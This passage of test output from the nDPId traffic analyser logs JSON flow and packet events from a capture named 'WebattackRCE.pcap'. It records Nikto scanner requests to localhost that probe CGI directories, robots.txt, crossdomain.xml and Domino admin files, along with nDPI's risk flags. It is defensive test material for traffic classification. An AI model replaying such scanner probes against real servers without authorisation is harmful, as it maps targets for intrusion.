+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="} +01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="} 
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 